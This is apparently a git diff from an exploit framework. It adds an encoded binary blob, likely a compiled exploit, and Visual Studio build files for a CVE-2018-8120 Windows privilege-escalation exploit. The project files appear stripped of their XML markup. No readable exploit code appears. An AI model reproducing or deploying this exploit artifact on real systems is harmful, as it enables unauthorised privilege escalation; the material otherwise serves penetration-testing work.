z+8B4YQsecHb2Y6%_p=x5y|2?`^4=R!18Nm=2QEm0iDxIakXn^}uSB#caR-4MFJ9G%^GZ$yu|F$a~6?qM=W z&AQ=_NC67mx&e=wXt>~Pb?gNXbpkosn`1U*I2uc$y6?a=7cAG`SvR~2SG0DnhoezA z69=9WLcSdLgSy6gFT;vD5)1J?Wq4wRmY2pf92=xA?>>O;dnpvSPSe-*0k`-sgI|9> zdwLX}ASU_}Llb^{Y28I|Pf?_iv#+tUdz7PtThHrDEOMf{EY0Yiu zE9;8?+67oYA9i3j^aK`sjNSvC4|ZtI;%w1^r}MCVEOu#9-~?R> zc4l&$r#0c4b3JgA{~-2fhGKta7VXbOyPEwmO-?J3HF#L~iTxS>K|O6(lQY)3eGc|# zoS!4*Kd^2;hCP|rU3;BJktwZgYA4{Uuz4TqF-LQP1=}g#2S5H*Yr|^HWubfB+E5Ff z{t|E1yl#Dfwr*Y!J2eosxnej%Biexz;+A*cM*h%JE(0(Bz=qW){3)O_e-a3ePR_eO zXJ=W$8KhhbXKO6}c*pdzNPm=L`qzBF)C1?xhL1wHs3UMYxbj@-leUY z2@qVl#*%0Ld@A@!+hg#2+;&N}MC2$a38g`Y?i5=jb8RyX^C$|1^3IM*=?ic^7$bRKgq`Eb@ zFS8$Ilm8U9Q-0uBzxb%njItAfV}Hg#uwCO0oxtu)e4p5yX>D4KFr7zp(~kH%5H9)* z_(ddQa|Xj({4R89I3(vhDmG`13c7(js}5|(reQI0g7}ld%ZL}@(9;)XUwBtc8 
z$Dx0(3{UOGp#wQibtJZBC|uh7HG{Hnes971tUo4eRW=s1xc;^1E?)NzK}g?+v!{{I zo+$vw${g|e-$zpaAWWN_9|xT8G&#Gu8Big7-ZMc4R(ATGQ7uSDj~?8>IiUyM#IfS0 z1s~%g^UtUeZD=F*Y+y0Aa-Ir<)JRW`vM` z0B&+WS}KYUkA-aSMkClCY#WZL;CD}GgEQ3Kgl^F|bnH|%&}AP4xZm0^hjfmtH>?jh zpwoBq?&ba!vG8@GJDaRQ`=eD$7)~u=C|W|CXbIhugoAzl5z+xRL>$xIU;3l*|FrK# zJ@9901bW~Uv56LguJW2!f9wc+j27UW@FAK*f1dfwRP3gx7O;z3KoVL&2Q76DQ484R zXc~ryxdrHHU*Iiow1CedHk?|!3wPnSgS?$-Ur+6p6z#5I30nRBekj=mu-VEHx^&2bi3M~G?z?L8z zfNp+AG=LUR{J;i)8@Y!>16Uv%0EEI*Qk$HT{4wKHcvh zME z_YnE_j3&RMFeg_#mQ3)X{RW&*pthbVYcivR_WH(bc9?sqrjp90=Rdl`jvlz#H3W0s z?(6$#cRByWju9{ulos%x029g4T=0d%I=5G>P9eM#Z9@!v=2LRTDc76vpPLWoqht99 z>FhyEL;tdJihlZ-)B4;Yw74~2BR_i%eS(e&-4Z$_XWEfNpJAOFPu7^bvbW|nc;w|? zJd<#g4pe-LR(Le~LKogn(RGg_RszZp$kC}BcTlrBzpk{7|p~wm{#}A6Kyn; z%=&;RyQ_9Q_1l>B(m8hO?{x^<2S?!m#2a9aK^-WMgl0WoCx<|D|@8Vib4$jC!c z=^G>P|N3iI-Q6=pub(m9pP=uF$beB^*3sI}=wA$cVf-28)J8h4IHK2oV#cAaHb>)p zv!k&z87u@kOnfQLC)2K>?(DINwBW_OvIV6UzFmyqGyE0~`XmMYw5WO6rJ=4TU}k^` zpKFMt@eVVH0rNQUoV%|*B{olaQkqACnT)W=w4d`J)ItMC#4sVVfS~ymkn7M zrfX3WbW1SMAsiVW!QedqbO8%18;fyI-34qLUaCg{;-Z;2a%42-Sg>YoVbE}N!-&w6^`%cD7*qxWtv4+)+tUk%=PF7!IwTsn1vpV!P8P8Z& zC$s8c^>$W0tk$#oAgfQZx|7v6Sp7Y#y{w*NHQ{y{-)L5+ucgyVVf9z6?qGF4tM9V<@2s9=^&G27To0GAI)&9) ztlrA%dR7&^6mt11JY^8x$@P7hRpstt>gLg!U{)4*rMh*wR5$%hs=aqfb+G?wY@fMJ z+GmWpu)D$jy8I>)U;T2aR%x|biB_X|H8=hyYo%Hx{xmJ8#_O!B@D+G#O5C-zp-?a( z7GKLBWqjy!#b^JM#29SESI?NbAo{u(+a%O7PD%HPj5jeJ#<-X9aK_oErTb*YTNtM> zw)IK-k&KHNk7C@xcr@eeGt&K7#+w+AQ|=kt8E-i&-H&H%`%>b|7;Ar#xQ=l-JbZ|Y+EFpe*p467QSqQMQQ=<~4BwA5xwSgfnHwqd z;XnDVLb+A~Rp1vMD%E3&whS)Zh>J?bJ0J!XeyBb#9DX_c7bDJ#g`-MXg%_$n3XjUT z5+T@;x*Ghi5viADOLbKX6KPKrM|DV)GqC1l3^M#F+O%MKeD(6a3$e(uqf)v`lsA3Q1nDhF)qBa;XU0j{nsn z-4!D43hf?|8yRmXHbtLPv=IG#_3|RxS@EBYZy-IXl2!G8e(H%f6pfvq{;6T@H3x03 z5Uy1|E)-U%&ywXmRl7P^e>zH$T1^#bP}Vz9WcafijB;Q@mm5Kp+1=G?b=HCCTb!(>V+$VK4eW!KCca^{Dk^< zRSti<|CN0K(JJMDQXqTgs*BK0sDGQPP5m3?=SL1H)O>BemaFAKN3#TK&D1Wa->HI* z%2SpP^|9omO7sjXVOJ_jf>K50LwyFdqvaxmP*`M7?e#)*|36XwcI1YrM5dbRpIRY} 
zj}_=u-B2m*icW|&Xhfx+m?)zR|JCTBawe%pl~cMXC!)m)Q7_b&r=o8v0rHCR==@$K zRGvgp=a&@qr#|@hBNXayiN56jkWUA~uS9JXBi?Gzu4;3NzC!&g*;Dybs8k9>&2sJ# z-kZwta;XR{UAUl}EJyfWn5p(38u1<4T*R)Ubmzd``C}7N(H!lj3)&G~7J|m+g4X6= zz=g^Sxua5`)K-Afh!#UJ*~uDx$v}H2e8^F9Jlb=dRv^$){4YibGZ2FOu1AfLJ7pv5 zLB>HLF2j#{&uZ-(!oy^gF^SNlFvGumq^v}QL}OqXQfk+3g&9$i9943(H2m4mOKBcl zEfMMRf(GeJt@c+|UM@pVMa)Epm7t;UFPfwPnl#O(nWMGn2wSAn>5QW9nhfL>U#dN` zU{Q=kyDlSRVF8Y=+3jM=ZYe4+!l!9IUF>r^mqRM0vu+{QR|3y>R~388YrJk@Mgb$x!gAP^&i56U zEW62H>@9}iOER8^-IexDf#l?Ztc<1=5mWVu4dbs>nRxPQitSHH=s9uIb#fNk{+-1f7 zN}r>$(ox|>CDeE;+`)LA)&8paD{Fo3s=OLhlDk&bPfeAl*z2C}^Hx+Zg&E>^pu$ju zRmG?=!qP)-byf*OzCBb<>rmG9goccVtba;@Tn zy`nY|5SkAaiZr^4M7v$+F4YRl{n{*Vg*Ly~M|P#f=xSjvREi1iY6-w?wbaS@ z;m<290O3FA9^v@CjAj>CYqQ)-wESYPrhB|lS8B5n|7?Gyru&zIHa*(h5}!7wX1V5Y z%Pt0f(8gDiKd;areE2UZhl(&Nh!=w}1RWt9F)$!3f30YhMDHHZa;RM({2D@tBixwc z3t}CIA`0-MFF*gP($cF|DmH~yitkE$K0Z5XR^k)xT&@{aRWm}Ip!s5)g@4dNHCz+| zQz94QKT#~roc&N|p|`DoIv?~zNtXU-Z7jo;{zF)XQ;RU93mG2u*C8_m!{K`enX34d zZxt`i$wOx3e>TFWbk9P_OQ6!siTYDr%mXB*6wc;+l1g=XYfA*}5bM znJ&2=B8~^;i9VUm8st@)$@I$kddQVZ|3Gscsid!fRnq6+i2$SC0vf`TqL*@2gLWioy(M z!-fq}nwF7KUr^tuS+vxzXBI51$NUA8oPvTz__U|iH`c?KhG|ZDdAY?BQ|Ixl@OaLf z-(cz_zAY1Ff2jDITN%^5fxc~w)!b(XV{dsliyy zCVLsHxmO?K1P)J|B-1;Dv4!za#x}-Q#>tFrjO~mS|238IFt*QNJe+YR<0Qt}jA;j( zJ{My;R7PI`W5uss#5hG-YekF|zqXvQ;@5f@D}HSqW6VFrSI=1SZyOma{_Q5lc6Ps+ z@p#5t7%TqmR>l+9ejDS7jCU}e#JGj=*BG}m{yO6h#%i|S$@mJk?_!+B*kF7m<6g$; zjQbd0#aR2Atp95nTNq!**v2@MaWdoSjO~o&Y6i;$#yD~yz6{3Mj58VQjI$Z%Fm^F^ zFfL#`i}51HH!&_^oXfbJ@odH(#y2yrW31*M^^E7TeIw%n#+w-5%6KzlHDB1m_;$A6 z%Gk|#8{@T%cQ7__2hhSef^i39GvhACk&M;6DvEJ0+eb6jzAo!ChOv#Yg|VG+EaPo4 z(tSMR47N{ToXvO$;{wJ*85c3OGWIaGF|KEv$XLx6hcQ<3MH0h7-zIjS#CQwi5sbGn zzJzfL<7CDij8hnQF&@ddm+>gZTB^+dXvQ|iV;I{Rk7b;}cpT$w#&*U9jK?!BVtg56 z590}p>lsgEyovE7##iR#rPV=ix^+axSa8IjO!R@GHzr%o$+SIGZ=4WoW*zt<8Lr-XM7{$PR7}c z4aPd-KE^qWEmz3=I~dy;I~iv%p2awu@lA{i80RuBVmzC%hw;sf>lx=U-o$tg<1LKm zGTz3xfN=}sd5k+4-^#d)@j}MEjBjVGrOEud8QT~yV{B(!$vA`YI>ywO< ztpgR~r-wIdn{fi;0>&d57ctIa>|t!;30^(pNXDBO 
z$1vW)IF|7?#&L{W7$-39U_6p>7vn6(eT+>!VYEz^`Hy9s%s7s5D&qvknT$s=b}`Ok zT*TPK6G{)`SjP2?;}~yZJd*Ji##xMaFgDp~^wYF<#<6w*wNA!yj1A?Vai8)(QM$KW z#rb8N%s7s5D&s81nT$=T(!WdjXS_)HXI!q_Un$+!Dff&Um3zjUmHQ0oeyeiNc!zS& zxLvuQCf#=`_lynYo^hXYpDEp2GGzYa7$-BPOH1^nDtpG6%063IYc6Hac#*;mXyds_G;a(*7Y{F zXEM<2jB##Md>M?lGgj+-#RqV)y_4UgY82cjP+sat2n|3gMhV9!K|0`p)j#2BjPPPxQz2ZZ}FgDm;t-};w!ov1_ zZ2uHv%T!tZuQN_&{0qjZjQ26lWc)B=7vr6b7cqX7aXI5>8P_p>i*Y044#t}q-^_R` z;}*s{7$0G*_$;xE+u8mQ<4(r!F*X<^#+{6hF*X?QVXXKd z6Bzfgy;?^rzJ=m@Sgw)fQ>nsdzJ}tXB(r_F3U3f!ES2r^*gl#2+sTYG*}j&s#^J{^ zcCr0;7%yV{6UOC?f5o_taX#Zl#?LX{%=krxIX#N6vX$){*}jPF6`y7Y+bceUh0~kB z?%Ua3@jdM9U-5xD+1|(Q%h^9qdo+XXpJw|$#)|J@WA{VY-g2$1pSg?`Un-SxGTYzH zcnkX<$2gVki}+pkdl%b(m+>OTw=hm+_cq4mY(I~&jmsyUaUI)x z8E3Hl)r=e2zD~Jk`x%Tkv;BR_KgXZQcniC~k?~e`-^6$aZx!QY#tn=&vHKesr?UP1jO*Dxi*Y8~ zuUGEbK7+A~?H^~ni17-><&6D|>liO!oXPne#<-E~zsGnp<3h$;8GoN~Hv1pWcn8}z zGhW2$y_Ru1+pl5lV*g2uJK6qL#szFYg0aE&3mNw@-ptsNDa-#s#>tGIV4TW$E8|5R z{w0hv*?tk@BDTMjv5W0*W32e1*E3$k_8SyVDf5wk7_HcYDj5o9W9gKId z{bh`|vVEztXZ$kbcE-CHcQW3_*kHVaaUbIYj4jh;dG2Lg$MKJ3oXqxjGFJ2U4;iPj zeH-I!#xF5m#Q3L-J&Ye^T+i{1V%*5~|IBzZ#;I(-gz;v!AImtC?TZ+@IQ(e}v;7Yl7cstsq+>t>@?F? 
z!h58&i%lP$#H5eTF-cX{810kOS0;AdNtGiXoqMHE?#gT8L>gf_dr2Ri_n?o?b1;WD<-7-7jFO|z&FQM*aEnnA^etn5bW)Z+I=@OE-GiZT z8M|M`;nm{IAANofm(Ci~N4Fv9qx%o^(P?w3%JkEDLHeqK8AXu^by^q11a}Je}q;1M2D0f<(}w~%1`CLR{JKf9t^)0 zrA_v#Jcv%yky;n0hv=2C3XkZP(x<{B`lb9i*gerPonHvm7nRpcO^wGy*A$;BU$@Ag zGZ;V7c{);eD~Ct)PFR&6(LKed(nIv04%c(oJ+%YMUp`}M4}@>W|2+8hG5t~d2&Wrr zC+YB|@`xT-% zS#q*}p%5j7eG~bil9|ahL#M*S>#<7I)0|*A%l;@=Q|mDrhp4|%?M0s738jz5BZ^JU zS7|(=*i^m9{vqUF_75TZYLWl&{(*)IgxkzWVtwl^e4w}SFk+*MznvMD&MM3$ zLM>Ou?+DV5j6Xlv52*M<{UOC4qBj{o-Pe(yj6am#C4#;v{=xMx)1hisrh{%M$WNAk zZjcUTJOx2}8BadfE{)HUZZ8xM^#F=OWjuvJ`jPR3`bilN-IkDFc(?=Wm2UBbMkX09 z-LVKy|LibK?d;ZIerm;xCNz>u|F;G0Wx8^L{fH{(P`YH#qbN)ISG@?$uc)482J2Oo zpK90A{p?^qrTfAl9ZC0kuwJG6ys-38__qho6HE81wW;=YbC^B3F9_?0s629lPFeLE-N2=Gm~aU&gaug)1>j3wIwn zfhyBOv>I+tx5L8mHwW3%C>L%|qf|InvlJEo%CP*>XeE2|lCXYUn#li^uva0_dLkXE zSK-U~vs!J@e46Nn?nKE?_9sgaLOMp)P&jg)O|>dNT946PFSTx`w4|eyRXNFdcPVBm z@{|3XJOfQ85{J(HN=*O5-P5hKfmp6K)H)#@(@=hFQ>K{}M}iKtDv zr}C$p-r<;T*$u>l?FafV9pqo0-KG#^e4+Z5cq!;AJpA$?-AMZ?+&&Jsr@M{eSgjgW z_;lxcp#8w~d4hB+!>3tIxO@K~d%9hz>}j4vH{KPdd21*?avec;>*XiceTr*9d;^-V zt5ve(BT#v(@Z|Uyq927-KO`~zSK-t6SsA29X5wAr*jo7YVd@9zzx?F7B-~!Mw~#&Isv!Nz^&9<{pIp}~?vdmth0~9m z=PND~*;D-C?kW6Ge<0Ukq4Y>Tf#OOLKZfX??oY~3V)`#XH7`~@hQg}FE38_ifcpT`p%zvVhm{tqvoaP#o|O1{i;q(Xj@e-cWMobOS8B72w+mK3Y7@-K0DFg+5} z{dM_CTpR2kB=!ZzPsy(d#h-(jIjvb1U`9TX!}y1Si$mxArQ-g+{5#+7d=nRLV*jpYm`22ML^4|Mp=0r(VGBe}n=|>wT>Xj}W@k2Sp!=_u+mI`p7Scet=Z zuzth+4>UGy3_RHUt%o*!`{75v^WE=#fAgdN{Da3H|KSr`e)Qy1KmN&2f422se*Uk& z_~oyj-uCO?JoD^tpWD9U`JFGk_|nU-w6wPE+WqRDz3uzXjRoc;38e>sOYI3moE zQPDA$*tqzFAw#XU#9_meMqF}fa>~e2qsNRLXCHsrgo%^B_Vv`uuSmNxeezWqS5KKb z?V4+^%bY$V>-rnMabtGzl9Ez)+0ycgyO&i~Ro8gF>8dCwhpF8-&xiY{({ z@2b^n*8Xqj|9?CF|8n{3GjklySvR?IXWyKcKWA>iE%W9V;+=s-x7{ww|Kj$47v=w7 zCBKVj?<pcj;v1&*}BncxTv! 
z91$Ufz+P5dQR(;6+?K)>_V!7oalqBSW!~z_D$ithotXMo`)X>*L}B3`GAkVJl{LksFt%T57rOAs?G@FKl2KebnNlg!J;-0UYt2;*X&bekVqZylVeyhm zHI3JDZgr+l$+$W*J@e`*8FqJ_r?RHPXJ4|?p6#!Ocnoi9xzFdRopIGwODlZk{w0%3 zYO1c1HkXTd7m&1w8RU^l#188!NV$k}))iNID#I);t9JYBen^P07nfF5RP+CtQiozr*5i);s!fVq`1r0l{r#U{ZPWP=9UZ20XGT&WQ1Gx=U zKeJG~c3+L%>#nV-T<*4C#BFLu-K0gA%iLH$5Z+!Tq)y33dUf0 z77InyhlND$AnW5ovM&ZWC3--H?I=A&fl~6>CskI~UAdyh3+hl1^Z|E;-ioDg13@VE z<^IZQx3_pnMP-F=<>bkeh5cL<%?groQ@s>M6il2p$9Ie0?OmA*VKv_6qOp}hJc-Q5 z`Q>vVw_%y0{39LCO80WKA0z{UFqR{@rEW@s_{ct|(p_9l)_zaO9I}-bW1d!swcSd= z-yrE@Qc5Ao2Bh`AADCoEO~TsCjujvMr=5-Y@a4pgij?gnD{7$#V?KNoLuTEb*ynd+ z6-#_o$$Pm2t4NA32l0_aMG9HUm?9Z+B-vmgY{`d`2R2^212KExi(;UBaOK%cyd)#2 z)V=~u!S1O*%PbwwvMouUl8abhGNaTcR36T>_agmpFY1-}vy!mI>w3M_cZKSCsIjY0#i71ffU9W1| z_;JzNxIey}eCbE8BwKdxNp2aYX?eqOjy>0;jkiQ-mT9|_3GW^OnGDLT^wng-Z{hbE znIRJcakQo(ObuabgTgeyEt00iO^epzrbK%ZaUt4@d|0Q%dkU|I9qcP{xOq8#?-&61 z5>w)|6kmdtQW~$NOoM*jh~D8{i5=uV0`>;nUTKHOijT>)ru`P!X~)yIj1yDLTFT53 zo+J!pDvrIdHzVP<{1rC=*zXN@Gs2>c@Znb)qm4lNM@&iVQsF&=elKG}D7;va$5<_H zUUV>Db}al~#IFuK%oXXpPpapcm^ji)Nh{ zD&sP=>rVW3s{GrcHJdL+vmsx$DG9-R%|Mwg#_x!7ml&-jq7D+L4C#vZ#1*Oh$4`aK z6a0FWJ1VPb@l-~=)~+Ef;cidD-K1&A3)gSTwei5U=1Hbw7^PTe?#lJMDRGtm!$;#$jxULKvd$#G&n= z{h&OO=Gi=^LHRbtMrg59qB2r4;#P)rW56FO15ap zrT7)bXvrws4@IyM1kq(%NS~Fd0(Jn<@U0MhgZQ{}?!#yT@f@UurqS*`M zH9N}PK4o<8$gbp$OIngVMC;UE678_xJx;Ux#=`9wxErn6aj`R{_tLHr9g^me6m7?y zcy$fGv0Uzdg#LlMLO2n^1%@Nu;Zv-F=E#o^<@zK1rn8@Cp#KEFd8%!OwPn>FFD*sC zf}iqpE%b}=Q+`Z>CgVYqae^jIV-mD6zIbg6%47`6WDLq=%oLIO783+244D?I4Ve;M zV2X~=qNhY;$o>OT3cb-D69hI`ypbMrQACDpbFyDibom}OUTt7fdyrmIIgA3?r=TxE zd8Z)0lqsT5X;J>3gWFZLkh8$~jODhf>|?<;9D*N}KdFhA#-Z-4sJEforSpdOCU#jn zi0YO5Ux1N46`M&v9#C#Eq7PJVBCxr68-8ud4fT5;q0jS$r4xOha{mGj;d)nv+^0;6 z(=I7Y)GnE3(=PE2>$Pjp21kKO^Yv(?aPCMY8mGQI@%+9rnC|!Q*R*r^ zeZlz@b>fZ45PmMwXME74X_syc^%*8HCRkB_L$#E`A*e%)4-b#%5`6*2FjGu~7GwH> zs2{2$`q3xa3)7J*$6XI=+A;hRy4g(!MTL0l<_3v}2e{UxF-ZJPCP zyeB1nh;y8882b7|(3edco-_2}xL!+FbVp>18q2Akq(3YC4b`l_5&o_j=d;0|q|4z` 
zhk6J5qx2_Uq)-3&Cz=-j(@>u-%Jx3QBgzNmQW%BuiPVyYp&yNlAX?5a4UN!-PKnDf z4WsgkLwP}+BFigLmV2;G+_p{AYVZq|JN3oLqwP1KLJ#%+vc6IvbY#f1ByGsaXb;gO z?fIraP)Ynr+3tg8=?U66-w177X%hPGVcNLg1jo<en|@ zoRrRa=x0Q~l!$)GhJMM4erc#S=3&{Zri_Z#5=@C&cw6z1UolP%!#I_Qcrac)983e( zH)ypKw2J;*%w@bIx>Ay(wAc?+NU}{9QCi1DYeP@QbSWFkgNQ?nA7Nw4u%s@UCzyss zYr{Sot_|}gYQql47l``04B=pom#EU35h2P#gcB8^MNKntnT$u7Bww&hwjnK^Le+va z?H71!!QKlwpZvxKthG;J<~a#DRAKH?>8%F1+ZN`|1+yZ!+Y)A04zmK7UFiGAdm^&j z|M8xPEQkNC_e2(&!k_0jXu{e)NAgA>3)Q_)dxs^YD#iewPK_Wp17xadRb-Z5Q|hmD zOW~oowl+U<9@su4JXF(OC3~MN{iM{azVpzCHV-a2O*dEO>;iv=~m2K=|g!etSEKoloxxoccPTG zuqJ4)?WGXr`%1ZbwG&Z7`mZ3Ticsi;=Yao*l8rVw+?C)|4lbC@CLu$ZTn1$ae;~`G z8hkc)P5~D6VHn8>BZ6ZlT1X=-=%SEkkF<(@+wO(C1-&0X7NmO#3Qi7muH^qj1SDsaE_b z4(b}nED^t9{3G-6_>uWF_z}hwLEs$57>Iuil{K!5Tg+k?{$_!fZnUv-tc#!pZedS>P|55kv8`bhH&xoW-_rC zKQQ!nn3@01BwdtDcy@YGGO_=6rs97utpB$N!xSMUEB_c1l%o4q-Z!2L_NVVl&5wQ} z)pbvF{h4&xYwCr%74BP~diyE6v_9|ux^vPfo7LZbMfWsKKap;Bej2f(s=TY zi-*7FN5aP~m{8sF_CLLC*Y0}z?zg9$@BT>V@4L?6yxkg^vVyw@uD57h%nA1uDeWU! 
zwXmANs*TkoR+CvB&FVx}Gg!@J)x~Ndt3|9g$7&s`t5~gPbv>(%tUk!Sk8Au)3AiXIXubRTchj#;>vZCaYbn_OjZ?swGO6QxdDmtlC-4VAaLy|7q`hz?>-W zJU-h)$@OTBo;`zbnhLn71vkig2H7P8t`aI}Eci5{)a>C(I2H&5FybOX5Mu!evS`{O z%%A+3%uHsYS2d+uh`4y+c~*#mlB>W)K}nC(Cq3;M7399Zommb&+g_ii&vVan*Lj{F zpYObR=bd-H@4T~_$@?+`-#>ijy5D5LWYA>TWW;3DWXvRIGH0@2vTU+u5|8az+NaH= z-K4{$)1=EJYtm!VYtm=ZZ!%yqXfkXvYLYXVGdWOx!CWtyteC8svsat2Q60pADK|EFBL;EUyadAt9u&*^x6-!WAde|5c`Ek=5QHONjj z82baq`Q_stSpOVf=t$GO2`#iv3)O8PjnczQjQyN`>`%j0=F(-B%S4TG|5(y6MT!Bx z2K>2hqETM6$z}L~H$*@3eqpJtVsJy-aQf_7y1%6RG8S@%a@z5I#Whn`x)E`I9p)|0+Q-R7`fCf7CV@x8sDww+2J`tajZZ+~ya)&nBVE=yCCuZ**KXWZCL<%a-r+O!rMbk=`oQ+;BttYiHKaT3;SD`|(fSnk#Ruf7rNND9%0_SvYOqPoK8`=xg8i_m0Ad89ayR zd$rG4K65W_{rX`sNdMH`v+kSlFSl=edf_E&e(Qeu;OLH_@Axiz@wMN$OBan;J7w4u zb#M9uH=BB4UZ;M+FK<|P$~~^NXYz`7-{{``=1KRSGiUaZQAWqPvgH-Pt|<=Ij;E9_V(D9P!FKJv%3iZC}5_-G1j?FFpM1 zjIK+5aj*OE2TdC<-1X$6-}CZydLH`0FFyy6%Iiv039&kL@b_;8)2`9e#`p^@7jiA1U6h@XbhWU3Z^EGztSkj1FlCnQO*W%i5+9~GC_`?wla|GHCRz~8Qf&CJPj578`yaGY>v4iu>^iHt#YKCb>It%&{l!vGx=vZ=K z$xOF5!fOQOA%+liTwUNVO8?8KwpM3V;fN_Im`p6&Kx3=xN|bh!`}{)nsf-+>M|z3*bs8yh5G`_%?#t>ooY# zSd@u&>;nJ8)OGMddz@Kzaq|zac+y7lQH^z>9rG{!2j#LHUW}X2EmlW^m8l_}vh? 
z0!HsaJ3$klzZdm~&Vw}s)t@-nZ)gj6sNL|NICu`m9wWa69F3ql5H&>qIR-Ad4`m_G zQt(3r<@pG-br@w5|LT6^NBR)(;9PhPeF(f@p5d((^dhJ}#M88nJjCXIF!n|4G&Rvb zAJ1ZEz$@?##C^zL2B&u7c%gg1lL#ua3N|k=>PEbFv7uS;UQ_$Qh^b59-!8#9fO5Rx z76ctvH@H0n-=R71MFf?f2Y-VgPd)s^@LsueuAKSo(AVe480cg zt~NCB|`uj3?&7(Lckbg9I7D0WGS;sIxK~SD;VDn?> zQ>ZiX7=q6K3OF-rlpg_KM$j?#f`9qAp@)F;5&iyvcl-$FF!Iats9Ysh(fcV4-td*gYAfJ=peWl5r>X}J2zom8MG&cI&U^SU;89H zL?n=Y8vNlF;~4$mjIC%>q|XG8J%#HRbcKkZYXWh~(}stBaPKyFf@@R}ob(K?>Cis# z=Ll+}9`LsaI`%=^am_@Kz6X4dH1b!$%Xb**!$Acx9O;8N^f>|kLKD}CcsD3?6#P8F zFdLwmB+d&8XrepCFh7H4!A}v?cBjE{X`?>P;7kP7fw&2A1o>lNbB19~Kocj*3xWLo5JCoA<`Ta z(nOjYLYhePJV+C1o(5^+K~ocHz6GTd2UiVEq%r=KPNZ@8q=_^JpEPm4scCFHjdQ1T zB8^ceO{B5tq=_`vn>3NeZj&a`_+8S(QKrVx{(1R-??6NUZ^Sm^Hu^j_=zrP3_v)`m zr}u4o@R>i?z^tT9Us_t+;RT%ob46Pl$6o7fw0F=LJIqULZM<{lEn{4b_Rvy{ylU@U zw6LSK@xhKzqkG~vzTVOv3gM01oe$bkz`{^#Bi?&|V`xsGV?ldp%z}AymMjV_x_{{y zOnAMqJ+$E35^rk{@0?LrCs$0N*i}o|903i)G=on z=5ju0t|Mhh$6~w$9TO3~1G6qe=RQ3DsXH2#h9$w(b?MA9-6vv`6A3I zZL}|&H)+lsj6G~^yuZCO)X`{fI#*6h)9>C(OVbzX)Y5eB;IMg1(|~VS`BGbaDmT_cU8BfNS z31q^VXeOSKGWkp~Q_fT~^^8Tf$qv~idt{#+ki&9Rj?0pqmy2>)uF7@UqSzFN;!-?{ zPYEbtC91>~Ny#fkrL0tyx?)jnszY_D9@VD?)UX;=u6;h>CB~?o?X=~b^cBa|1H|cQmeH)5 zU2|%z=GFXKP>X0Wjni^kK`Ut$t)?-$Rk!O-oz=a%Uk~aLJ*IPdPA}*sy`tB2OzdOu z^%EV;%Go(5$8uiI&jq;%7vnfC#}&8|SK(?L!&`Yf@8ntD%lr8tAK_y>$LIJ0U*ao# zjb{X_U>BSMD|iLJ5ELRpOyJOC3qlF~wI(p46}`?WvZ7b?i$O6W#zaoci3PDFR>Ydf zB&-R0!kJ(b-h@99Ohgi~1dRk3f~ploM~3m^-qx&VBppS|)zNkqw4M#^=Rga(q#(SB z!yO6!(cgl&*XXam1y0-G zwF7Ru;I{{k$I;`;=xsK*8-TlE_*+5$s-cH5f(72%;4bwu7Cp_2zUD`7BbTG_Igao5 I|5um)1iaR?OaK4? diff --git a/external/source/exploits/CVE-2018-8120/CVE-2018-8120.sln b/external/source/exploits/CVE-2018-8120/CVE-2018-8120.sln new file mode 100755 index 0000000000..a9ee202779 --- /dev/null +++ b/external/source/exploits/CVE-2018-8120/CVE-2018-8120.sln 
@@ -0,0 +1,28 @@ + +Microsoft Visual Studio Solution File, Format Version 12.00 +# Visual Studio 2013 +VisualStudioVersion = 12.0.21005.1 +MinimumVisualStudioVersion = 10.0.40219.1 +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CVE-2018-8120", "CVE-2018-8120\CVE-2018-8120.vcxproj", "{B076D8F6-7924-42DD-B101-54A162D2EBD0}" +EndProject +Global + GlobalSection(SolutionConfigurationPlatforms) = preSolution + Debug|Win32 = Debug|Win32 + Debug|x64 = Debug|x64 + Release|Win32 = Release|Win32 + Release|x64 = Release|x64 + EndGlobalSection + GlobalSection(ProjectConfigurationPlatforms) = postSolution + {B076D8F6-7924-42DD-B101-54A162D2EBD0}.Debug|Win32.ActiveCfg = Debug|Win32 + {B076D8F6-7924-42DD-B101-54A162D2EBD0}.Debug|Win32.Build.0 = Debug|Win32 + {B076D8F6-7924-42DD-B101-54A162D2EBD0}.Debug|x64.ActiveCfg = Debug|x64 + {B076D8F6-7924-42DD-B101-54A162D2EBD0}.Debug|x64.Build.0 = Debug|x64 + {B076D8F6-7924-42DD-B101-54A162D2EBD0}.Release|Win32.ActiveCfg = Release|Win32 + {B076D8F6-7924-42DD-B101-54A162D2EBD0}.Release|Win32.Build.0 = Release|Win32 + {B076D8F6-7924-42DD-B101-54A162D2EBD0}.Release|x64.ActiveCfg = Release|x64 + {B076D8F6-7924-42DD-B101-54A162D2EBD0}.Release|x64.Build.0 = Release|x64 + EndGlobalSection + GlobalSection(SolutionProperties) = preSolution + HideSolutionNode = FALSE + EndGlobalSection +EndGlobal diff --git a/external/source/exploits/CVE-2018-8120/CVE-2018-8120/CVE-2018-8120.vcxproj b/external/source/exploits/CVE-2018-8120/CVE-2018-8120/CVE-2018-8120.vcxproj new file mode 100755 index 0000000000..4e9c6ce019 --- /dev/null +++ b/external/source/exploits/CVE-2018-8120/CVE-2018-8120/CVE-2018-8120.vcxproj 
@@ -0,0 +1,154 @@ + + + + + Debug + Win32 + + + Debug + x64 + + + Release + Win32 + + + Release + x64 + + + + {B076D8F6-7924-42DD-B101-54A162D2EBD0} + Win32Proj + CVE20188120 + + + + Application + true + v120 + Unicode + + + Application + true + v120 + Unicode + + + Application + false + v120 + true + Unicode + + + Application + false + v120 + true + Unicode + + + + + + + + + + + + + + + + + + + + true + + + true + + + false + + + false + + + + + + Level3 + Disabled + WIN32;_DEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions) + + + Console + true + + + + + + + Level3 + Disabled + WIN32;_DEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions) + + + Console + true + + + + + Level3 + + + MaxSpeed + true + true + WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions) + MultiThreaded + + + Console + false + true + true + + + + + Level3 + + + MaxSpeed + true + true + WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions) + MultiThreaded + + + Console + false + true + true + + + + + + + + + + + + + \ No newline at end of file diff --git a/external/source/exploits/CVE-2018-8120/CVE-2018-8120/CVE-2018-8120.vcxproj.filters b/external/source/exploits/CVE-2018-8120/CVE-2018-8120/CVE-2018-8120.vcxproj.filters new file mode 100755 index 0000000000..9677223056 --- /dev/null +++ b/external/source/exploits/CVE-2018-8120/CVE-2018-8120/CVE-2018-8120.vcxproj.filters @@ -0,0 +1,27 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + 